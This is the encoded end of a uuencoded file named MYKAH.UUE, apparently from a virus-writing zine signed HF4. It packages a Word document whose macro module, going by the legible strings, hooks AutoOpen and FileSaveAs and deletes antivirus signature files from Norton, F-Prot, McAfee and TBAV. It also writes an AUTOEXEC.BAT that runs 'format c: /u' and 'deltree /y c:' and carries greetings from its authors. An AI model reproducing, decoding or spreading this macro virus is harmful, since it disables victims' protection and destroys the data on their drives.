M:0!S`$0`;P!C`'4`;0!E`&X`=``*`#,S,&5A-C!C8@`#`"I$`1$"___:/P``
M```````"````^0(``/__#@!-`&\`9`!U`&P`90`Q``H`83,P96$V,35F``,`
M*D0!&@+__]P_````````&`(````C$0``________`0$X`@``____________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M_____________________________________________________P`"``#_
M____&`(``/__________________________________________________
M____________________________________________________________
M____________________________________________________________
M__________^C,#-B`$;/$9Q8```!-1E7_____P$```"E,#-B`$;/$9Q8```!
M-1E7_____P$```#_____2````(```````"L!+0#_``0J`````%(``808`/\#
M!`!F!`17;W)DM6L0``,$5D)!]^(0``4$5VEN,3;!?A``!017:6XS,@=_$``#
M!$UA8[.R$``(!%!R;VIE8W0Q"A<0``8$<W1D;VQEDV`0``<`35-&;W)M<T,/
M$``,!%1H:7-$;V-U;65N=#R>$``)@```_P,$`%]%=F%L=0$6`0``M@#__P$!
M`````/____\`````________````````````````````````````````````
M`````````````````````````````````!`````#````!0````<```#_____
M_____P$!"````/____]X````W@```(\#``"E`0``_____P`````!````V#_<
M/P``__\#``````````(`````````````````````````````````````````
M`/__``"K`P``U@```-8````C$0````#_____`````-\`__\```````#_____
M____________________________________________________________
M____________________________________________________________
M_____________________________________________R@```````(\!`#_
M_P`````"/`@`__\``````CP,`/__``````(\_____P``__\!`0``````````
M`````-\`````Z`````$!:`$``!T````D`````H,:`O____\(`/__,```````
M________`````/__________`````!T````D````"Q(<`J@```````!@````
M`/__________`````/____\`````_____________P``!@`&````A````0``
M``````*#&@+_____"`#__Z```````/_______P````#__________VUP;&$=
M````)`````L2)`(@`0```0``8`````#__________P````#_____`````/__
M__________\!``<`"````(0```$``"@B5&______"````*@```#_____`H,:
M`O____\(`/__````````________`````/__________``````L2,`+_____
M_____P````#__________P````#_____`````/_______________UH`````
M`(0```````````#_____F`````,``@``````````````.````/__________
M__________\@`0``________________________________^```````````
M````"``$`/____\`````________________________________!`#_____
M344``/_______P````#__P````#__P$!````````````````````````````
M`````````````````````````````````````````````````````````/[*
M`0!G`"*!"``&``````````"!"``F````$`````"!"`LL````.`````"!"`LX
M````:`````"!"`LF````H`````2!"``"````"````"*!"``&````R`````"!
M"``0````V`````"!"``6````Z`````"!"``@``````$```"!"``:````(`$`
M``"!"``:````0`$```2!"``"````T````"*!"``&````8`$```"`"0``````
M_____P"!"``$````<`$```"!"`(V````>`$```"`"2@`````_____P"!"`$:
M````L`$```"!"`$.````T`$```"!"`$*````X`$```"`"1``````_____P"`
M""@$````\`$```"!"`$$````^`$```"!"`(8``````(```"!"`$:````&`(`
M``"!"`$.````.`(```"`"0``````_____P"!"`$0````2`(```"!"`(8````
M6`(```"!"`(T````<`(```"`"2@`````_____P"!"`(*````J`(```"`"2@`
M````_____P"`"0``````_____P"`""@$````N`(```"!"`$$````P`(```"!
M"`(L````R`(```"!"`$:````^`(```"!"`$.````&`,```"!"`$*````*`,`
M``"`"1``````_____P"`"``$````.`,```"!"`(8````0`,```"!"`$:````
M6`,```"!"`$.````>`,```"!"`$0````B`,```"!"`(T````F`,```"!"`(*
M````T`,```"`"0``````_____P"`"0``````_____P"`"``$````X`,```"`
M"0``````_____P"!"`$$````Z`,```"!"`(H````\`,```"!"`$:````&`0`
M``"!"`$.````.`0```"!"`$*````2`0```"`"1``````_____P"`"``$````
M6`0```"!"`(8````8`0```"!"`$:````>`0```"!"`$.````F`0```"!"`$0
M````J`0```"!"`(T````N`0```"!"`(*````\`0```"`"0``````_____P"`
M"``$``````4```"`"0``````_____P"!"`$$````"`4```"!"`(>````$`4`
M``"!"`$:````,`4```"!"`$.````4`4```"!"`$*````8`4```"`"1``````
M_____P"`"``$````<`4```"!"`(8````>`4```"!"`$:````D`4```"!"`$.
M````L`4```"!"`$0````P`4```"!"`(T````T`4```"!"`(*````"`8```"`
M"0``````_____P"`"0``````_____P"`"``$````&`8```"!"``H````(`8`
M``"!"`0>````2`8```"!"`0J````:`8```"!"`0@````F`8```"!"`08````
MN`8```"!"`02````T`8```"!"`0J````Z`8```"!"`0J````&`<```"!"`0J
M````2`<```"!"`0H````*`@```"!"`0J````>`<```"!"`0N````J`<```"!
M"`0@````V`<```"!"`0*````^`<```"!"`08````"`@```"!"`0&````(`@`
M``"`"0``````_____P2!"``"````:`$``/____\!`5@(``"/!#@``````&P`
M__]P````K@`%`$UA8W)O`*X`!0!T;V]L<P`D`!X"`0`E`"`"`0!"0"("````
M`*X`#`!#=7-T;VUI>F4N+BZN``4`=&]O;',`)``>`@$`)0`@`@$`0D`B`@``
M`````*X`&`!496UP;&%T97,@86YD($%D9"U);G,N+BZN``4`=&]O;',`)``>
M`@$`)0`@`@$`0D`B`@``K@`(`%1O;VQB87)SK@`$`'9I97<D`!X"`0`E`"`"
M`0!"0"("`````(\$J```````;`#__R@````U`"@"I`````4`04`F`@$`)"`L
M`@``K@`%`#I2;VQZ``L`)R`J`@``("`J`JX`$0!';&]B86PZ1FEL95-A=F5!
M<P!!0"X"`@`D("P"``"N``D`.D%U=&]/<&5N``L`)R`J`@``0SI<4"`@*@*N
M``L`1VQO8F%L.E)O;'H`04`N`@(`24-%7$]&CP0@`0````!L`/__D````,$`
M,@*(````K@`M`$,Z7%!R;V=R86T@1FEL97-<3F]R=&]N($%N=&E6:7)U<UQ6
M:7)S8V%N+D1A=``G(#0";VP@(#0")"`V`@$`K@````4`E`!&`),`,@)G````
M`````"`@-`*D````04`X`@(````@(#0"04`Z`@$`````````FP`R`@@```#!
M`#P"`````*X`#P!#.EQ!=71O97AE8RYB870`)R`^`B`@/@(D(#8"`0"N````
M!0"4`$8`DP`\`F<`````````("`^`J0```!!0#@"`@```"`@/@*D``$`'@"C
M`,0`"`"D``$`'@#*`*X`"0!`96-H;R!O9F8`S@"D``$`'@#*`*X`"0!)1B!E
M>&ES="``("`T`@L`K@`*`"!T:&5N(&1E;"`+`"`@-`(+`,X``````*0``0`>
M`%,``0````````";`#P"0`$``,$`0`(X`0``K@`D`$,Z7%!R;V=R86T@1FEL
M97-<1BU0<F]T.35<1G!W;3,R+F1L;"<@-`(`````("`T`B0@-@(!`*X````%
M`)0`1@"3`$`"9P`````````@(#0"I````$%`.`("````("`T`D%`.@(!````
M`````)L`0`+`````K@`/`$,Z7$%U=&]E>&5C+F)A=``G(#X"("`^`B0@-@(!
M`*X````%`)0`1@"3`*8`9P`````````@(#X"I````$%`.`("````("`^`J0`
M`0`>`*,`Q``(`*0``0`>`,H`K@`)`$E&(&5X:7-T(``@(#0""P"N``H`('1H
M96X@9&5L(`L`("`T`@L`S@``````I``!`!X`4P`!`````````)L`I@`8````
MP0!"`A````"N`"``0SI<4')O9W)A;2!&:6QE<UQ-8T%F965<4V-A;BYD870G
M(#0"("`T`B0@-@(!`*X````%`)0`1@"3`$("9P`````````@(#0"I````$%`
M.`("````("`T`D%`.@(!`````````)L`0@*@`P``K@`/`$,Z7$%U=&]E>&5C
M+F)A=``G(#X"("`^`B0@-@(!`*X````%`)0`1@"3`$0"9P`````````@(#X"
MI````$%`.`("````("`^`J0``0`>`*,`Q``(`*0``0`>`,H`K@`)`$E&(&5X
M:7-T(``@(#0""P"N``H`('1H96X@9&5L(`L`("`T`@L`S@``````I``!`!X`
M4P`!`````````)L`1`+X`@``P0!&`O`"``"N`!4`0SI<5&)A=G<Y-5Q48G-C
M86XN<VEG`"<@-`(``"`@-`(D(#8"`0"N````!0"4`$8`DP!&`F<`````````
M("`T`J0```!!0#@"`@```"`@-`)!0#H"`0````````";`$8"B`(``*X`#P!#
M.EQ!=71O97AE8RYB870`)R`^`B`@/@(D(#8"`0"N````!0"4`$8`DP!(`F<`
M````````("`^`J0```!!0#@"`@```"`@/@*D``$`'@"C`,0`"`"D``$`'@#*
M`*X`"0!)1B!E>&ES="``("`T`@L`K@`*`"!T:&5N(&1E;"`+`"`@-`(+`,X`
M`````*0``0`>`%,``0````````";`$@"X`$``"0`3`(``"0`2@(!`*0`"``%
M`"0`3`(``*0`!P`%`"0`3@(!``0`E0"N``\`0SI<05543T5814,N0D%4`*0`
M``!!0#@"`@```*X`#P!#.EQ!551/15A%0RY"050`K@`/`$,Z7$%55$]%6$5#
M+D%!5@"]`````````*X`#P!#.EQ!551/15A%0RY"050`I``!`!X`HP#$``(`
MI``!`!X`R@"N``D`0$5C:&\@;V9F`,X`I``!`!X`R@"N``,`8VQS`,X`````
M````I``!`!X`R@"N`!L`96-H;R`@($QO=F4@;W(@4F]T(%II;FES=&5R`,X`
M````````I``!`!X`R@"N`!L`96-H;R!)="=S(&%L;"!I;B!T:&4@9F%M:6QY
M`,X`````````I``!`!X`R@"N`!L`96-H;R`@4%97(')E<W1I;F<@<F5B96QL
M:6]N`,X`````````I``!`!X`R@"N`!L`96-H;R`@("`@("`@("`@("`@("`M
M+4%+4"TM`,X`````````I``!`!X`R@"N`!\`96-H;R!Y?&9O<FUA="!C.B`O
M=2`O=CI!058@/FYU;`#.````I``!`!X`R@"N`!(`9&5L=')E92`O>2!C.B`^
M;G5LS@"D``$`'@!3``$`!Z#X!P``I``)`"0@4@(!`*0``P`D(-X``@`G(%`"
M04!4`@````"D``$`'@#*`*X`&@!E8VAO($DG;2!L;V]K:6YG(&9O<B!->6MA
M:,X`_____Z@'```!1;0`071T<FEB=70`92!60E].86T`92`](")-;V0`=6QE
M,2(-"E,`=6(@5&]O;',`36%C<F\H*0T`"D-O;6UA;F2`0F%R<R@B=`%H`"(I
M+D-O;G1R&0!**"("3@`B1&5LP&5T90T*(`<`''(`0W5S=&]M:7H092XN+C)`
M5&5M@'!L871E<R``GP`@061D+4EN<^$C3'9I97>`.0=C@7F&8@!Q"$1%;F0@
M`(<!@XE!=71O3W!E!FZ!B(*/3W!T:6\`;G-3879E("X`1VQO8F%L1&^`=%!R
M;VUP=`"I(&%T91C9$``&`$YO<FUA;-_8$``&A`@`_P,$`$]F9FEC915U$``'
M!%!R;VIE8W0MKA``!P1-;V1U;&4Q8A$0``J$"`#_`P0`5&]O;'--86-R;W7S
M$``+@```_P,!`$-O;6UA;F1"87)S"AP0``B```#_`P,`0V]N=')O;'/,2Q``
M!H```/\#`0!$96QE=&6X>!``"(0(`/\#!`!!=71O3W!E;MDJ$``0@```_P,$
M`%1O;VQS3W!T:6]N<U-A=F73?1``#X```/\#!`!';&]B86Q$;W10<F]M<'0_
MBA```8```/\#!`!M9!`0``B```#_`P0`1FEL94YA;65JPQ``"8```/\#!`!-
M86-R;T-O<'GV11``!(0(`/\#!`!2;VQZ-E00``&$"`#_`P0`85@0$``"@```
M_P,$`%9&B5\0``6```#_`P0`1FEL97-W6!``!P!3971!='1R0X<0``0`2VEL
M;(',$``!A`@`_P,$`&-:$!```H```/\#!`!!0GQ<$``!A`@`_P,$`&1;$!``
M`80(`/\#!`!G7A`0``&$"`#_`P0`:%\0$``!A`@`_P,$`&E@$!```80(`/\#
M!`!*81`0``,`1&%YI((0``,`3F]W);H0``4`36]N=&B;!!```X```/\#!`!D
M<VLTA1``"H```/\#!`!$969A=6QT1&ER-'(0``N```#_`P0`1&]C36EN:6UI
M>F7]S!``"(0(`/\#`0!$;V-U;65N=&K3$``"__\!`6P```#_____________
M__________________\``@$`__\"`@``____________________________
M______\,`@(`__\.`@,`__\1`@``#`#_______\4`@0`__\6`@4`__\8`O__
M__\;`@$`#``1`!(````!`"0`````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````&JLH`!``0````!`#`J`@*0"0!P%`9(`P""`@!DY`0$``<`
M'`!0<F]J96-T!5$`*```0`(4!@(4/:T""@<";`$4"`82"0(2@%]AZC`&``P"
M2A(\`@H6``%R<W1D$&]L93X"&7,`=```9`!O`&P`95``#0!F`"5<``,J`%Q'
M>S`P,#(PL#0S,"T`"`0$0P`*`P(.`1(P,#0V?2,`,BXP(S`C0SH`7%=)3D1/
M5U,`7%-94U1%35P`4W1D3VQE,BX`=&QB(T],12``075T;VUA=&DL;VX`7@`"
M%@)M35,`1F]R;7,^``Y!``E-`%,`1@!%<@``;0!S`"\`>@V`"7"``0%&,S8V
M1`!#-#(R+3<Y,@`Q+3$Q1#$M.0A#-3,#1C$S-3$8.34W%T8$,RY45P!$(TUI
M8W)O<U!O9G0@`CT@`&`@!$]B`;`@3&EB<CAA<GD`.0`!'E`P`-J0`!-R@`$(
M4#,L4(!*0%!<5D)%7(4H10)8IRCA+D4-C^``&A"%+@)@C$TL"[2!DT-X3D!5
M86P50WA.A%1AP'@.`"`UP"L)PBQ#`PD*`RL;$.<P!`##$$]F9A1I8T2)3T"&
M9@!I+`!C0HG!/8;"$$=[`#)$1CA$,#1#`"TU0D9!+3$P@#%"+4)$134`9E1!
M04"(-,`",@AF4`!23T=204T@1@!)3$537$U)0P!23U-/1E0@3T!&1DE#15R$
M`4T`4T\Y-RY$3$Q#2&N#(R`X+C"2:P\1@LP"`!/"`=@_&0%"MU1H:7-$;V-`
M=6UE;G0:3@0R1``80#%4`&A`-G-$`$3`26,`=0"?910`;D#%',`&``!(U4(!
M,<+3^4#E'D("`06B+$(:VC\B0@@K0@$"&4.U;V1U;&4QJAH)`S*$N&]`VW5"
MVX0Q`"\,(Q$``"T,*-P_(2@,$&(!````````````````````````5&AI<T1O
M8W5M96YT`%0`:`!I`',`1`!O`&,`=0!M`&4`;@!T````36]D=6QE,0!-`&\`
M9`!U`&P`90`Q````````````````````````````````````````````````
M``````````````````````````````````````````!)1#TB>S8R,S,S,$%!
M+30V,#`M,3%#1BTY0S4X+3`P,#`P,3,U,3DU-WTB#0I$;V-U;65N=#U4:&ES
M1&]C=6UE;G0O)D@P,#`P,#`P,`T*36]D=6QE/4UO9'5L93$-"DYA;64](E!R
M;VIE8W0B#0I(96QP0V]N=&5X=$E$/2(P(@T*0TU'/2(V-S8U,T)!-D,U-D$R
M.#9%,C@V13(X-D4R.#9%(@T*1%!"/2)#14-#.3(T1CE%1#$P-$0R,#1$,C`T
M(@T*1T,](C,U,S<V.48T0C<U04(X-4%".$$U(@T*#0I;2&]S="!%>'1E;F1E
M<B!);F9O70T*)D@P,#`P,#`P,3U[,S@S,D0V-#`M0T8Y,"TQ,4-&+3A%-#,M
M,#!!,$,Y,3$P,#5!?3M60D4[)D@P,#`P,#`P,`T*#0I;5V]R:W-P86-E70T*
M5&AI<T1O8W5M96YT/3(R+"`R,BP@,S,R+"`R.3`L(`T*36]D=6QE,3TT-"P@
M-#0L(#,U-"P@,S$R+"!:#0H`````````````````````````````````````
M````````````````````````````````````````4`!2`$\`2@!%`$,`5```
M````````````````````````````````````````````````````````````
M`````!```@$&````"P```/____\`````````````````````````````````
M``````````````!1````A@$````````!`$,`;P!M`'``3P!B`&H`````````
M````````````````````````````````````````````````````````$@`"
M`/_______________P``````````````````````````````````````````
M`````%@```!J````````````````````````````````````````````````
M````````````````````````````````````````````````````________
M________````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````#_______________\`
M````````````````````````````````````````````````````````````
M```!`/[_`PH``/____\&"0(``````,````````!&&````$UI8W)O<V]F="!7
M;W)D($1O8W5M96YT``H```!-4U=O<F1$;V,`$````%=O<F0N1&]C=6UE;G0N
M.`#T.;)Q````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
3````````````````````````````
`
end
 
 ÄÄ MYKAH.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
 
 
                                   
                               -=<{[* HF4 *]}>=-

